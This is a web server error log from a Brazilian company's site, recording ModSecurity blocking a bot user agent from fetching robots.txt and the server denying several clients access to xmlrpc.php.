[Tue Mar 17 04:06:27.374814 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.244.31:58544] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj9c5DEJR9VXonE_-0nSgAAAQs"]
[Tue Mar 17 04:10:45.867050 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.228.16:39570] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj-ddCmCSWTlPouqoqngQAAANA"]
[Tue Mar 17 04:13:45.434690 2026] [:error] [pid 11469:tid 140411691570944] [client 74.7.244.31:50348] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj_KZDEJR9VXonE_-0ntwAAAQY"]
[Tue Mar 17 04:15:49.643316 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.228.16:44354] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj_paBJNF7axNlVR0XaPQAAAAc"]
[Tue Mar 17 04:19:12.600609 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.244.31:60226] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkAcO82sZHvlq4xgHqf7AAAApc"]
[Tue Mar 17 04:22:21.039423 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.228.16:48280] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkBLZDEJR9VXonE_-0oYQAAAQc"]
[Tue Mar 17 04:28:18.403641 2026] [:error] [pid 2305:tid 140411607643904] [client 74.7.228.16:45766] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkCkgQohV2v-7oj5HHYiAAAAZA"]
[Tue Mar 17 04:30:15.965051 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.244.31:52256] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkDB6BJNF7axNlVR0Xa-gAAAAY"]
[Tue Mar 17 04:35:13.154477 2026] [:error] [pid 4740:tid 140411658000128] [client 74.7.228.16:48050] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkEMQfYLcKp6Sb5AeIWIQAAAEo"]
[Tue Mar 17 04:35:18.866052 2026] [:error] [pid 4740:tid 140411599251200] [client 74.7.244.31:35908] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkENgfYLcKp6Sb5AeIWLAAAAFE"]
[Tue Mar 17 04:40:30.321562 2026] [:error] [pid 2305:tid 140411548894976] [client 74.7.228.16:33070] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkFbQQohV2v-7oj5HHZIAAAAZc"]
[Tue Mar 17 04:46:00.007816 2026] [:error] [pid 2304:tid 140411691570944] [client 74.7.244.31:41174] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkGuMh3JZxwdBQwPYHSvAAAAIY"]
[Tue Mar 17 04:50:58.475483 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.228.16:34624] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkH4u82sZHvlq4xgHqh6QAAAok"]
[Tue Mar 17 04:51:05.943464 2026] [:error] [pid 2304:tid 140411565680384] [client 74.7.244.31:33082] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkH6ch3JZxwdBQwPYHTYQAAAJU"]
[Tue Mar 17 04:51:22.631659 2026] [access_compat:error] [pid 2325:tid 140411632822016] [client 45.94.31.197:45016] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 04:56:17.850810 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.228.16:50262] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkJIdCmCSWTlPouqoqqogAAANM"]
[Tue Mar 17 04:56:30.611759 2026] [:error] [pid 4740:tid 140411557287680] [client 74.7.244.31:52484] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkJLgfYLcKp6Sb5AeIX8wAAAFY"]
[Tue Mar 17 05:01:29.573160 2026] [:error] [pid 4740:tid 140411590858496] [client 74.7.228.16:39890] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkKWQfYLcKp6Sb5AeIYWgAAAFI"]
[Tue Mar 17 05:01:35.776892 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.244.31:35918] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkKXwQohV2v-7oj5HHbJgAAAYA"]
[Tue Mar 17 05:06:52.132785 2026] [:error] [pid 2304:tid 140411641214720] [client 74.7.228.16:42382] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkLnMh3JZxwdBQwPYHUqgAAAIw"]
[Tue Mar 17 05:06:53.550105 2026] [:error] [pid 2304:tid 140411574073088] [client 74.7.244.31:45612] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkLnch3JZxwdBQwPYHUqwAAAJQ"]
[Tue Mar 17 05:09:14.891046 2026] [:error] [pid 4740:tid 140411683178240] [client 74.7.228.16:53890] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkMKgfYLcKp6Sb5AeIY6wAAAEc"]
[Tue Mar 17 05:10:32.299721 2026] [access_compat:error] [pid 4740:tid 140411699963648] [client 73.231.36.91:54536] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 05:12:02.616863 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.244.31:47894] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkM0tCmCSWTlPouqoqrfgAAAM4"]
[Tue Mar 17 05:13:07.627169 2026] [:error] [pid 2304:tid 140411733534464] [client 74.7.228.16:33266] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkNE8h3JZxwdBQwPYHVBQAAAIE"]
[Tue Mar 17 05:17:21.007123 2026] [:error] [pid 2304:tid 140411716749056] [client 74.7.244.31:46784] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkOEch3JZxwdBQwPYHVTQAAAIM"]
[Tue Mar 17 05:18:19.835430 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.228.16:59276] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkOS9CmCSWTlPouqoqsYQAAAM0"]
[Tue Mar 17 05:22:27.694826 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.244.31:42152] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkPQ-82sZHvlq4xgHqkJgAAApQ"]
[Tue Mar 17 05:23:24.166561 2026] [access_compat:error] [pid 11469:tid 140411616036608] [client 181.192.86.119:24494] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 05:23:38.314818 2026] [:error] [pid 2304:tid 140411599251200] [client 74.7.228.16:49442] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkPish3JZxwdBQwPYHWHgAAAJE"]
[Tue Mar 17 05:28:40.838156 2026] [:error] [pid 4740:tid 140411699963648] [client 74.7.228.16:33420] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkQuAfYLcKp6Sb5AeIa6wAAAEU"]
[Tue Mar 17 05:32:58.036604 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.244.31:42398] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkRutCmCSWTlPouqoqtTAAAAME"]
[Tue Mar 17 05:35:27.872794 2026] [access_compat:error] [pid 2325:tid 140411641214720] [client 45.154.98.78:40684] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 05:38:18.414819 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.244.31:54658] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkS-pDEJR9VXonE_-0uiQAAARc"]
[Tue Mar 17 05:39:06.323428 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.228.16:49458] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkTKgQohV2v-7oj5HHeHgAAAYA"]
[Tue Mar 17 05:43:53.359935 2026] [access_compat:error] [pid 11293:tid 140411733534464] [client 45.94.31.197:46112] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 05:44:30.838197 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.228.16:57218] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkUbu82sZHvlq4xgHql5QAAApU"]
[Tue Mar 17 05:50:10.999172 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.244.31:37594] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkVwtCmCSWTlPouqoqvCgAAAMU"]
[Tue Mar 17 05:55:11.124979 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.228.16:40292] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkW75DEJR9VXonE_-0xPAAAARQ"]
[Tue Mar 17 05:55:34.867196 2026] [:error] [pid 2304:tid 140411590858496] [client 74.7.244.31:56072] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkXBsh3JZxwdBQwPYHaJwAAAJI"]
[Tue Mar 17 06:00:21.075081 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.228.16:53622] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkYJaBJNF7axNlVR0Xl_gAAAAY"]
[Tue Mar 17 06:00:36.441309 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.244.31:51686] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkYNO82sZHvlq4xgHqqdgAAAo8"]
[Tue Mar 17 06:05:32.885963 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.228.16:52540] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkZXKBJNF7axNlVR0XmdwAAAAM"]
[Tue Mar 17 06:05:53.758540 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.244.31:41530] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkZcZDEJR9VXonE_-011QAAAQc"]
[Tue Mar 17 06:10:40.111432 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.228.16:60024] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkakAQohV2v-7oj5HHldwAAAZU"]
[Tue Mar 17 06:10:58.107906 2026] [:error] [pid 2304:tid 140411658000128] [client 74.7.244.31:41956] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkaosh3JZxwdBQwPYHewQAAAIo"]
[Tue Mar 17 06:16:02.284908 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.228.16:47590] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkb0qBJNF7axNlVR0XoEAAAAAY"]
[Tue Mar 17 06:16:25.541111 2026] [:error] [pid 4740:tid 140411540502272] [client 74.7.244.31:48722] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkb6QfYLcKp6Sb5AeIkGgAAAFg"]
[Tue Mar 17 06:21:12.375037 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.228.16:49572] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkdCKBJNF7axNlVR0Xo6QAAAAc"]
[Tue Mar 17 06:21:33.021984 2026] [:error] [pid 2305:tid 140411632822016] [client 74.7.244.31:40726] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkdHQQohV2v-7oj5HHnuAAAAY0"]
[Tue Mar 17 06:26:36.947337 2026] [:error] [pid 2305:tid 140411557287680] [client 74.7.228.16:45312] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkeTAQohV2v-7oj5HHoaAAAAZY"]
[Tue Mar 17 06:26:53.114860 2026] [:error] [pid 2305:tid 140411716749056] [client 74.7.244.31:51226] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkeXQQohV2v-7oj5HHocwAAAYM"]
[Tue Mar 17 06:31:43.389368 2026] [:error] [pid 4740:tid 140411716749056] [client 74.7.228.16:43662] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkffwfYLcKp6Sb5AeImKgAAAEM"]
[Tue Mar 17 06:37:23.427208 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.244.31:47058] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkg09CmCSWTlPouqoq6DQAAAMw"]
[Tue Mar 17 06:42:13.179073 2026] [:error] [pid 11469:tid 140411590858496] [client 74.7.228.16:33150] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkh9ZDEJR9VXonE_-06hwAAARI"]
[Tue Mar 17 06:42:26.014254 2026] [:error] [pid 2304:tid 140411582465792] [client 74.7.244.31:51674] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkiAsh3JZxwdBQwPYHiwgAAAJM"]
[Tue Mar 17 06:47:38.162097 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.228.16:46830] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkjOpDEJR9VXonE_-07MgAAAQo"]
[Tue Mar 17 06:53:01.940730 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.244.31:47936] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkkfdCmCSWTlPouqoq7ZAAAANg"]
[Tue Mar 17 06:58:08.339183 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.228.16:59730] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abklsKBJNF7axNlVR0XtQQAAABU"]
[Tue Mar 17 06:58:26.475033 2026] [:error] [pid 2304:tid 140411565680384] [client 74.7.244.31:34416] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abklwsh3JZxwdBQwPYHkrwAAAJU"]
